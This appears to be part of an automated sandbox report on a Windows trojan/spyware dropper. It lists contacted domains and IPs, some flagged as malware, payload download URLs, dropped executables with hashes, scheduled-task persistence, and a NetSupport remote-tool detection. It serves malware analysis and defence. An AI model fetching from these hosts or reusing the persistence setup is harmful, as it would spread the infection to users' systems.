http://www.mildstat.com/ping/?count=true&id=55ghm2fide1	setup.exe, 00000003.00000002.3908328281.00000000022A9000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000003.2134776313.0000000002630000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.3923113346.00000000038CB000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.3913953749.000000000251F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2138422939.00000000035D0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.inlogbrowser.com/pp.txt	setup.exe, 00000003.00000002.3908328281.00000000022A9000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000003.2134776313.0000000002630000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.3926194076.0000000004211000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.3907486788.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.3926194076.00000000041FD000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.3913953749.000000000251F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2138422939.00000000035D0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=no&o=1661&a=2598&dn=419&spot=3&t=1	setup.exe, 00000003.00000002.3908328281.00000000022A9000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000003.2134776313.0000000002630000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.3923113346.00000000038CB000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.3913953749.000000000251F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2138422939.00000000035D0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.oces.trust2408.com/oces.crl0	a1.exe, 00000015.00000003.2982783017.0000000003E6C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.advancedinstaller.com	a1.exe, 00000015.00000003.2977076437.0000000005775000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000015.00000003.2977076437.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000015.00000003.2977076437.0000000005440000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000015.00000003.2980614290.0000000003EE0000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000022.00000003.3201994608.00000000025AE000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000022.00000003.3201994608.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000022.00000003.3201994608.00000000027E9000.00000004.00001000.00020000.00000000.sdmp, v114.exe, 00000039.00000003.3410203101.000000000223B000.00000004.00001000.00020000.00000000.sdmp, v114.exe, 00000039.00000003.3410203101.0000000002120000.00000004.00001000.00020000.00000000.sdmp, v114.exe, 00000039.00000003.3410203101.000000000249D000.00000004.00001000.00020000.00000000.sdmp, MSIA81C.tmp.22.dr, MSIF244.tmp.22.dr, MSIF323.tmp.22.dr, MSIDA82.tmp.22.dr, System Updater.msi.34.dr	false		high
https://allroadslimit.com/	Windows Updater.exe, 0000001E.00000002.3180467976.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://certs.oaticerts.com/repository/OATICA2.crl	a1.exe, 00000015.00000003.2982251688.0000000003E75000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://certs.oati.net/repository/OATICA2.crt0	a1.exe, 00000015.00000003.2982251688.0000000003E75000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.accv.es00	a1.exe, 00000015.00000003.2984792935.0000000003F43000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000015.00000003.2984699434.0000000003F42000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i	a0.exe, 00000007.00000003.2865495919.0000000002700000.00000004.00001000.00020000.00000000.sdmp, a0.exe, 00000007.00000003.2924531348.00000000024AD000.00000004.00001000.00020000.00000000.sdmp, a0.tmp, 00000008.00000003.2870256458.00000000035E0000.00000004.00001000.00020000.00000000.sdmp, a0.tmp, 00000008.00000003.2919948192.000000000383B000.00000004.00001000.00020000.00000000.sdmp, a0.tmp, 00000008.00000003.2920539243.00000000023CC000.00000004.00001000.00020000.00000000.sdmp, a0.tmp, 00000008.00000003.2920539243.00000000023C5000.00000004.00001000.00020000.00000000.sdmp, a0.tmp, 00000008.00000003.2919948192.000000000387B000.00000004.00001000.00020000.00000000.sdmp, a0.tmp, 00000008.00000003.2920539243.000000000237C000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0	a1.exe, 00000015.00000003.2982949114.0000000003E5E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ambadevgroup.info/load/1509/promo.exea62	setup.tmp, 00000004.00000002.3927324403.0000000004370000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://allroadslimit.com/VJH	Windows Updater.exe, 0000001E.00000002.3180467976.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://false.apparelsilver.xyz/	setup.tmp, 00000004.00000002.3907486788.00000000007D2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tankqueueipjsh.pw/?P:S	1922353491.exe, 00000024.00000003.3413197154.000000000519D000.00000004.00000020.00020000.00000000.sdmp, 1922353491.exe, 00000024.00000003.3424397873.000000000519D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl2.postsignum.cz/crl/psrootqca4.crl01	a1.exe, 00000015.00000003.2984699434.0000000003F34000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://web.ncdc.gov.sa/crl/nrcaparta1.crl	a1.exe, 00000015.00000003.2983645174.0000000003E57000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.datev.de/zertifikat-policy-int0	a1.exe, 00000015.00000003.2982251688.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000015.00000003.2984792935.0000000003F43000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000015.00000003.2984699434.0000000003F42000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pro.ip-api.com/json?key=IQgnKO7n5Bmojupi	a1.exe, 00000015.00000002.3155766192.0000000006F32000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mysoftwareusa.info/archives/70Ro	a3.exe, 00000021.00000002.3929526900.0000000003F48000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=yes&o=1658&a=2598&dn=416&spot=7&t=	setup.exe, 00000003.00000002.3908328281.00000000022A9000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000003.2134776313.0000000002630000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.3923113346.00000000038CB000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.3913953749.000000000251F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2138422939.00000000035D0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.acabogacia.org0	a1.exe, 00000015.00000003.2983645174.0000000003E57000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.firmaprofesional.com/cps0	a1.exe, 00000015.00000003.2984699434.0000000003F34000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.securetrust.com/SGCA.crl0	a1.exe, 00000015.00000003.2982251688.0000000003E75000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sparksteam.site/K	ZmWSzgevgt.tmp, 00000002.00000003.2130046254.0000000000978000.00000004.00000020.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000002.00000003.2130638305.0000000000984000.00000004.00000020.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000002.00000002.3908425172.0000000000983000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://sparksteam.site/L	ZmWSzgevgt.tmp, 00000002.00000002.3908425172.0000000000972000.00000004.00000020.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000002.00000003.2130161380.000000000096F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.157.197	send.planewool.xyz	United States	13335	CLOUDFLARENETUS	false
185.23.108.224	www.agenment.cloud	Hungary	6876	TENET-ASUA	false
142.251.111.84	accounts.google.com	United States	15169	GOOGLEUS	false
95.142.47.11	myptofgrtulo.info	Russian Federation	48282	VDSINA-ASRU	false
157.230.96.32	pstbbk.com	United States	14061	DIGITALOCEAN-ASNUS	false
104.21.83.145	tankqueueipjsh.pw	United States	13335	CLOUDFLARENETUS	false
104.21.74.109	allroadslimit.com	United States	13335	CLOUDFLARENETUS	false
172.67.150.192	dl.likeasurfer.com	United States	13335	CLOUDFLARENETUS	false
104.21.13.66	false.apparelsilver.xyz	United States	13335	CLOUDFLARENETUS	false
104.21.52.223	sparksteam.site	United States	13335	CLOUDFLARENETUS	true
104.21.37.216	axsboe-campaign.com	United States	13335	CLOUDFLARENETUS	false
37.1.198.251	ambadevgroup.info	Ukraine	28753	LEASEWEB-DE-FRA-10DE	false
159.223.29.40	kapetownlink.com	United States	46118	CELANESE-US	false
142.251.16.147	www.google.com	United States	15169	GOOGLEUS	false
152.199.4.44	cs1100.wpc.omegacdn.net	United States	15133	EDGECASTUS	false
142.251.16.101	clients.l.google.com	United States	15169	GOOGLEUS	false
172.67.165.204	sidemark.xyz	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
54.165.145.62	collect.installeranalytics.com	United States	14618	AMAZON-AESUS	false
62.172.138.67	geo.netsupportsoftware.com	United Kingdom	5400	BTGB	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1354609
Start date and time:	2023-12-06 14:49:52 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	60
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ZmWSzgevgt.exe renamed because original name is a hash value
Original Sample Name:	4f2d5d155fe7497f9ab429cae34c5ebbdd711b0256b3bae83d9038cf1526c724.exe
Detection:	MAL
Classification:	mal92.troj.spyw.evad.winEXE@101/627@61/21
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 81% Number of executed functions: 117 Number of non-executed functions: 172
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 72.21.81.240, 23.207.202.28, 192.229.211.108, 172.253.122.94, 34.104.35.123, 23.12.147.23, 23.12.147.45, 23.12.147.12, 23.12.147.37, 23.12.147.22, 23.12.147.14, 23.12.147.6, 23.12.147.20, 23.218.218.174, 23.218.218.155, 13.107.21.200, 204.79.197.200, 23.12.147.29, 23.12.147.13, 23.12.147.31, 23.48.203.202, 23.48.203.206, 23.48.203.196, 23.48.203.197, 23.48.203.200, 23.48.203.210, 23.48.203.207, 20.190.190.196, 20.190.190.129, 20.190.190.132, 40.126.62.132, 40.126.62.129, 20.190.190.193, 40.126.62.131, 20.190.190.195, 20.190.151.68, 20.190.151.7, 20.190.151.132, 20.190.151.133, 20.190.151.70, 20.190.151.9, 20.190.151.69, 20.190.151.6, 204.79.197.203, 20.110.205.119, 52.182.143.211, 23.48.203.205, 23.218.218.137, 23.218.218.154, 23.218.218.139, 23.218.218.177, 23.218.218.159, 23.218.218.156, 23.218.218.184, 23.218.218.153, 23.218.218.143, 23.218.218.183, 23.218.218.146, 23.218.218.162, 23.218.218.172, 23.218.218.176, 23.222.200.163
Excluded domains from analysis (whitelisted): ssl2.tiles.virtualearth.net.edgekey.net, slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, c-bing-com.a-0001.a-msedge.net, img-s-msn-com.akamaized.net, clientservices.googleapis.com, p-static.bing.trafficmanager.net, aefd.nelreports.net.akamaized.net, bing.com, ak.privatelink.msidentity.com, 124.t.keepitpumpin.io, e86303.dscx.akamaiedge.net, prda.aadg.msidentity.com, ocsp.digicert.com, login.live.com, th.bing.com, r.bing.com, www-bing-com.dual-a-0001.a-msedge.net, login.mso.msidentity.com, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, www2.bing.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, th.bing.com.edgekey.net, dual-a-0001.a-msedge.net, r.bing.com.edgekey.net, www.tm.ak.prd.aadg.akadns.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, p-th.bing.com.trafficmanager.net, 0.t.dancevalidator.io, www.tm.a.prd.aadg.akadns.net, www-msn-com.a-0003.a-msedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, a1834.dscg
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
VT rate limit hit for: ZmWSzgevgt.exe

Simulations

Behavior and APIs

Time	Type	Description
14:52:31	Task Scheduler	Run new task: AdvancedUpdater path: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe s>/silentall -nofreqcheck -nogui
14:52:45	API Interceptor	2379545x Sleep call for process: wmiprvse.exe modified
14:52:53	Task Scheduler	Run new task: AdvancedWindowsManager #1 path: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe s>-v 110 -t 8080
14:52:53	Task Scheduler	Run new task: AdvancedWindowsManager #2 path: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe s>-v 111 -t 8080
14:52:53	Task Scheduler	Run new task: AdvancedWindowsManager #3 path: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe s>-v 112 -t 8080
14:52:53	Task Scheduler	Run new task: AdvancedWindowsManager #4 path: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe s>-v 113 -t 8080
14:52:53	Task Scheduler	Run new task: AdvancedWindowsManager #5 path: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe s>-v 114 -t 8080
14:52:54	Task Scheduler	Run new task: AdvancedWindowsManager #6 path: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe s>-v 115 -t 8080
14:53:13	Task Scheduler	Run new task: AdvancedWindowsManager #7 path: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe s>-v 122 -t 8080
14:53:13	Task Scheduler	Run new task: AdvancedWindowsManager #8 path: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe s>-v 123-t 8080
14:53:13	API Interceptor	71x Sleep call for process: 1922353491.exe modified
14:53:13	API Interceptor	208x Sleep call for process: a3.exe modified
14:53:15	Task Scheduler	Run new task: AdvancedWindowsManager #9 path: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe s>-v 124 -t 8080

Process:	C:\Users\user\AppData\Local\Temp\is-GNVBO.tmp\ZmWSzgevgt.tmp
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	152
Entropy (8bit):	5.4340264917664
Encrypted:	false
SSDEEP:	3:N1KNMBwFfOYKrZK3VVeR3hX/+39EgisUHHOW8dfD9/QVomUdYdn:CemFfH3V4E39WJ5sJ/Ndw
MD5:	7F9918E645C527A3D1C1AE2C3FE0E962
SHA1:	341EBF5B195C0AD479949FD25A5434A7C544D2D2
SHA-256:	B807CCEEE6E4B54A37808296E36C68343B40581F7D45B74B5DAE8F485E68BE06
SHA-512:	A88C567CA0E469181EEC5E24AA974AB6A033A9C61F04270A67F3B93A3EA0441693E58145367D9E08DD0E526E5BA20A5FD813AF874AC3F04702B5F738FEE71E98
Malicious:	false
Reputation:	unknown
Preview:	http://sidemark.xyz/pe/buildIN.php?sub=&source=3890&s1=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG93bi10cmFpbmVyLTE1LXYxLTgtLmV4ZQ%3D%3D&ti=1701870648

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1036152
Entropy (8bit):	6.491502495873816
Encrypted:	false
SSDEEP:	24576:yViYocX3hU49N1frFMDtpen0qZQ9b1zCdUVdjKFoeO:8iYoM6EODtA0qZhdUVdjKFoeO
MD5:	00DF35EDF6E7E2345949AF6ACB6EC40A
SHA1:	C9DCD62666C9056DAE38CB292361ABC263C62ECF
SHA-256:	C7EE9A8357EEB602C67C4EDEDB3E96510352FDDA9BFDCE60C5902D4C0A57AF66
SHA-512:	53334A2C60A4CF95EE0D59E86F14DB5847C130A7A27E6E8C418AE6CEF21AF6CD463DA2F15CA1ADC26FAD6A236F0DD92D0BA5ABCD88A453BF02939C8C7C0E7E09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..7(.{d(.{d(.{d..xe&.{d..~e..{dJ..e;.{dJ.xe1.{dJ.~eu.{d...e3.{d..}e).{d..ze..{d(.zd..{d..reU.{d...d).{d..ye).{dRich(.{d........PE..L.....gb.........."..............................@.................................._....@.....................................,.......pc..............x....`.......:..p...................@;..........@...............t...<........................text...o........................... ..`.rdata..2...........................@..@.data...D)..........................@....rsrc...pc.......d..................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3635424
Entropy (8bit):	7.194637165266501
Encrypted:	false
SSDEEP:	98304:KKC4/jxH8S506fsWCDIOX3LFiU+3xOfXLBnkGK+NXZi:L/jxH8SCixOPLBuG
MD5:	8CAD036C5CFED94D5319A060C488E38F
SHA1:	731455086204F014C97EA3C1483DD6029961FF27
SHA-256:	62F773773392C101F673A8D3DB805D5AA3A45DBBB12E2B32BC746470AC520B0F
SHA-512:	5E673DE5820EBD47238AD83F4D98AC5CFC5D6AE5FA4941E24FB38C98F84CB852A3B38DEB1E4E2243099FBDB0CFD646D1AD3CCEB4E1380636A94CDED62DC473A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 27%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C...-...-...-......-..(.j.-...)...-.......-...(...-..)...-..,...-..*...-...,...-...$...-......-.....-.../...-.Rich..-.................PE..L...<.\`.........."......l...B......H-............@........................... ......88...@..................................L..(........{..........h\7.x....P..........p...................@.......x...@...................p#..@....................text...?j.......l.................. ..`.rdata..8............p..............@..@.data...@n...`...T...N..............@....rsrc....{.......\|..................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33144
Entropy (8bit):	6.7376663312239256
Encrypted:	false
SSDEEP:	768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
MD5:	34DFB87E4200D852D1FB45DC48F93CFC
SHA1:	35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
SHA-256:	2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
SHA-512:	F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\a1be65b801d44a9f9a1676f8e66ad8d1$dpx$.tmp\0a01aa728a4dab42a1a96bd575273048.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	4.0081320258334
Encrypted:	false
SSDEEP:	3:1EyEMyvn:1BEN
MD5:	6BC190DD42A169DFA14515484427FC8E
SHA1:	B53BD614A834416E4A20292AA291A6D2FC221A5E
SHA-256:	B3395B660EB1EDB00FF91ECE4596E3ABE99FA558B149200F50AABF2CB77F5087
SHA-512:	5B7011ED628B673217695809A38A800E9C8A42CEB0C54AB6F8BC39DBA0745297A4FBD66D6B09188FCC952C08217152844DFC3ADA7CF468C3AAFCEC379C0B16B6
Malicious:	false
Reputation:	unknown
Preview:	[General]..Active = true..

Process:	C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	16
Entropy (8bit):	3.202819531114783
Encrypted:	false
SSDEEP:	3:avXGS4f:aO1
MD5:	2C058EBACB1F52A22B32F432C8F83C24
SHA1:	D3F03BFB7A8843A7FA5E0A17065429DD9B41591C
SHA-256:	196096D1EC38523F3B28A201B214A22D24602A2EFEB5181E11FC503FBF298529
SHA-512:	849EF2428867E5F9DDB4F7297782B752D73E7A895DE808E9AF6A85911263859AE1117AD8C4CF07BDF714EBADC922344EE74722DC3884AC19DB100EAFFE5A29E7
Malicious:	false
Reputation:	unknown
Preview:	38.9072,-77.0369

Process:	C:\Users\user\Desktop\ZmWSzgevgt.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3199488
Entropy (8bit):	6.325059207580715
Encrypted:	false
SSDEEP:	49152:2WGtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbQ333TY:6tLutqgwh4NYxtJpkxhGj333T
MD5:	BE0E74DC6AC70C5B8CC74C42B6999A70
SHA1:	47C9E3346F8C051EA7415289E25E7836AD47500C
SHA-256:	D5485BA921C2D67DF5D63763C4650CAD24D8B7D7C65202A8F9CB5F3DAFDFCF12
SHA-512:	A851ED78B6F8C0ECBE449A20347DEBF2804DA656372F66CE907A6A7E29C9B921F3234CD17B5A044891CADF5F23708E11EA521AB1A007E5C24A95763E7E545A9D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1...........@......@....................-.......-..9...................................................................................-.......-......................text.... ,......",................. ..`.itext...(...@,.....&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc.................-.............@..@..............1.......0.............@..@........................................................

Process:	C:\Users\user\AppData\Local\Temp\is-1UG24.tmp\setup.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 6 12:52:16 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.973502512876119
Encrypted:	false
SSDEEP:	48:8HrdiTu2uHMidAKZdA19ehwiZUklqehvy+3:8H4PlYy
MD5:	717FE61D4C75454DABCB2608236257B0
SHA1:	B0BAD43B0B4D8B1E8AB05380E54AA1C05E49FCBA
SHA-256:	5043072E561FEB1B5E3EBC55C9447527B3ACF0B05CEF1AB84DB4DAE49474D2EF
SHA-512:	2E75DCFC83F6788416EEDE34BC5D112AF0357A767C75FA0153BEB7D730769A1C590ECC116B159A11790B45A915BE2BDC77AFE5532FCB3244818191161FA6BD39
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......lK(..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.W.n....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.W.n....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.W.n....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.W.n..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.W.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............&h.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Entrypoint:	0x4b5eec
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x63ECF218 [Wed Feb 15 14:54:16 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	e569e6f445d32ba23766ad67d1e3787f

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xc4000	0x9a	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc2000	0xfdc	.idata
